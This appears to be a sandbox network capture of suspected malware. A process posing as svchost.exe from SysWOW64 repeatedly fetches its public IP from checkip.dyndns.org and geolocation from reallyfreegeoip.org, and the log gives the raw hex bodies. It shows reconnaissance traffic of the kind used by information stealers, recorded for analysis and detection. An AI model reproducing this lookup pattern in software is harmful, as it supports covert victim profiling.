                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Jan 10, 2025 20:33:26.419132948 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 19:33:26 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.549707193.122.6.16880428C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 20:33:27.089777946 CET127OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Jan 10, 2025 20:33:27.716701984 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 19:33:27 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.549709193.122.6.16880428C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 20:33:28.388926029 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 20:33:29.014178991 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 19:33:28 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.549711193.122.6.16880428C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 20:33:29.661083937 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 20:33:30.322871923 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 19:33:30 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.549713193.122.6.16880428C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 20:33:30.950385094 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 20:33:31.614132881 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 19:33:31 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.549715193.122.6.16880428C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 20:33:32.243037939 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 20:33:32.898109913 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 19:33:32 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.549717193.122.6.16880428C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 20:33:33.535388947 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 20:33:34.264484882 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 19:33:34 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.549719193.122.6.16880428C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 20:33:34.874850988 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 20:33:35.518769026 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 19:33:35 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.549705104.21.32.1443428C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 19:33:26 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 19:33:26 UTC859INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 19:33:26 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1852395
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w24JEwrEE1MriSXhsAcbjwRevWhfqww5dvOr40l74mEYx2GNHcmp%2B49uSuE7TnHVasBut5%2BC1MLGwLHcnh245MhqA6FO2Lqzwkpl4O0%2F8H7kxheWeVvlor04N%2FpQXmajeUaF%2FSQe"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fff19466eb31875-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1578&rtt_var=600&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1850443&cwnd=153&unsent_bytes=0&cid=4744ed42c8e6396a&ts=176&x=0"
                                                                                                                2025-01-10 19:33:26 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.549706104.21.32.1443428C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 19:33:26 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-01-10 19:33:27 UTC855INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 19:33:27 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1852396
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sxco5u%2BFBK8jP5lDDyidh1nXIK1nCXBBRRi1BE%2FGk0bB76FVzNnHqSi3A2n4i07UIQaS1UNEvtn1vWaRWW5DKRP6hCs6PMc2SfJWsJdcABaMeuBYnS5TpBm6IWqWWJaGc%2BQ6QdRT"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fff194bce8772b9-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1794&rtt_var=682&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1594756&cwnd=217&unsent_bytes=0&cid=09de59ec8c34f96e&ts=180&x=0"
                                                                                                                2025-01-10 19:33:27 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.549708104.21.32.1443428C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 19:33:28 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 19:33:28 UTC861INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 19:33:28 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1852397
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xkXgc6kYCc1EgP%2Bsd20cYnN5JKNRxT%2FCHJMZL32zzKPa0mrsqbwG3t94HJOHVPWGKtQpEj7jXGcETfRjyuJI5Xx8T4TFUi%2BF%2BjJkqKueyincl%2F%2FGHom6WQ2ieIFTxIip9UCrlkGo"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fff1953beb641a6-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1597&rtt_var=604&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1802469&cwnd=241&unsent_bytes=0&cid=79f5165962831080&ts=179&x=0"
                                                                                                                2025-01-10 19:33:28 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.549710104.21.32.1443428C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 19:33:29 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-01-10 19:33:29 UTC859INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 19:33:29 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1852398
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pIEVOb5iDwGu0p2rfeU7t8t9PQAv7u5JOGwIHomiWDAESHAo6GnpQDPOeauJ%2BSNf3PMB%2ByH%2FfgWzIBfaG5VJIiXyE95he6G%2F700J%2BOxbC1Jlzdxb7doftuzDFRNyud9J73N1BzHw"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fff195bede21875-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1650&rtt_var=625&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1769696&cwnd=153&unsent_bytes=0&cid=4c4acbcf3a543726&ts=156&x=0"
                                                                                                                2025-01-10 19:33:29 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.549712104.21.32.1443428C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 19:33:30 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 19:33:30 UTC859INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 19:33:30 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1852400
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6qaHoMDLW1z5VclcofBZJoa2Nld9o42EzsaCEC%2BIql6UuOABfjHyIXtJoqKAIQo9M2bE7HbFu2Fqjz9q%2BWhSm2WOfI7%2FzxPPCVrpyi8C2wc5EUZtFOn1h1fpJoS2N4%2BJ5n%2BiXfia"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fff1963ff3f41a6-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1574&rtt_var=599&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1811414&cwnd=241&unsent_bytes=0&cid=47f539d0ac91a340&ts=156&x=0"
                                                                                                                2025-01-10 19:33:30 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.549714104.21.32.1443428C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 19:33:32 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-01-10 19:33:32 UTC858INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 19:33:32 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1852401
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7hOdLRRSj6Wz%2BOcUJmIa5HjycrdLBMNfpSffch8bzv6o67QtNDQoiJ8UUpkno2Ao0%2FnxtxwcbL6%2BRl0Oh6UtqV35L3peP0GDIYmkFws38XZvx1PG9%2BGHVw76qsbhl8g3zefk%2Fnhl"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fff196bed784344-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1601&rtt_var=620&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1738095&cwnd=47&unsent_bytes=0&cid=a97a5a5a8dbdc582&ts=156&x=0"
